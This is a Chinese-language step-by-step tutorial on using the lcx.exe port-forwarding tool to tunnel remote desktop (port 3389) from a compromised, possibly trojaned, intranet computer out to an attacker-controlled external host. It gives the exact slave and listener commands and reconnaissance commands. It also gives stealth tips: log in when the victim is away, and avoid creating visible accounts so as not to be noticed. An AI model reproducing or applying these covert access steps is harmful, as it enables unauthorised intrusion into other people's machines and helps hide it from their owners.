在理論上只要網路連接的電腦都是可以訪問的,但是在實際中往往由於技術水平等原因,很難實現它;例如區域網路中的某台電腦僅僅開放了Web服務,該服務僅能供內網使用者使用,而外網使用者根本沒有辦法直接存取。因此要想讓外網使用者能夠訪問區域網路中的系統服務,這必須進行連接埠映射等操作才行。連接埠映射在外網串連內網的時候經常用到,特別是要登陸遠程終端服務時,使用連接埠映射就非常方便。
Lcx.exe是一個連接埠轉寄工具,相當於把機器A上的3389連接埠轉寄到具有外網IP地址的B機上,這樣串連B機的3389連接埠就相當於串連A機的 3389連接埠。Lcx程式多用於被控制電腦(機器A)處於內網的情況,被控制機可能中了木馬程式,雖然能夠進行控制,但還是沒有使用遠程終端登陸到本機進行管理方便,因此在很多情況下,都會想方設法在被控制電腦上開啟3389連接埠,然後通過lcx等程式進行連接埠轉寄,進而在本地串連到被控制電腦的遠程終端並進行管理和使用。
1確定被控制電腦(機器A)的IP地址
在被控制電腦上開啟遠程終端,然後執行“ipconfig /all”命令,查看其網路設定情況,如圖1所示,該電腦的ip地址為“192.168.80.129”
圖1 確定被控制電腦的IP地址
2在被控制電腦(機器A)上執行連接埠轉寄命令
在被控制電腦上執行“lcx –slave 218.69.*.* 51 192.168.80.129 3389”,如圖2所示,執行完畢後會給出一些提示,如果顯示為“Make a Connection to 218.69.*.*:51”則表示連接埠轉寄正確。
圖2在被控制電腦上執行轉寄命令
說明
lcx一共有三條命令,第一條命令(lcx –lister 51 3389)是在具有外網獨立IP的電腦上執行,表示在本機上監聽51連接埠,該連接埠主要是接受被控制電腦3389連接埠轉寄過來的資料。第二條命令 (lcx –slave 218.69.*.* 51 192.168.80.129 3389)表示將本機IP地址為192.168.80.129的3389連接埠轉寄到遠程地址為“218.69.*.*”的51連接埠。第三條命令是連接埠轉向。
3在本機(機器B)上執行監聽命令
在本機上開啟DOS命令提示字元,然後到lcx.exe程式所在路徑執行“lcx –lister 51 3389”命令,監聽51連接埠,監聽成功後,會顯示如圖3所示的資料。
圖3 在本機上監聽51連接埠
注意
(1)在本機上監聽的連接埠必須是未使用的連接埠,可以使用“netstat -an |find “51″ ”命令進行查看,如果沒有顯示結果則表示51連接埠可以用來進行監聽。
(2)被控制電腦與本機成功建立串連後會不停的顯示串連資料,如圖4所示,如果未出現資料發送和接受的情況,說明串連建立不成功。
圖4 成功建立串連
4在本機使用遠程終端進行登入
在DOS提示符下輸入“mstsc”命令開啟遠程終端連接器,輸入“127.0.0.1”後單擊“串連”按鈕進行遠程終端串連,在出現登入介面後分別收入使用者名稱和密碼,驗證通過後,即可遠程進入被控制電腦的案頭,如圖5所示,輸入“ipconfig /all”以及“net user”命令來查看網路設定情況以及使用者資訊。
圖5遠程登入被控制電腦
注意
(1)如果被控制電腦是伺服器,則在登陸時可以直接進行登陸;如果被控制電腦是Windows XP系統,則最好選擇使用者不在電腦的時間進行登陸,否則容易被發現。
(2)不要輕易在被控制電腦上建立帳號,尤其是Windows XP,建立帳號後,會立即在登陸介面中進行顯示。
5查看本地串連
在被控制電腦上使用“netstat -an”查看當前所有的串連時,可以看到被控制電腦時在跟自己進行遠程終端串連,如圖6所示,而實際的3389連接埠是跟原生51連接埠進行串連的。
圖6 查看實際網路連接
本案例通過使用lcx連接埠轉寄程式,成功的在本機連入被控制電腦的內網,可以很方便的對該電腦進行遠端管理,在進行內網滲透時尤為有用。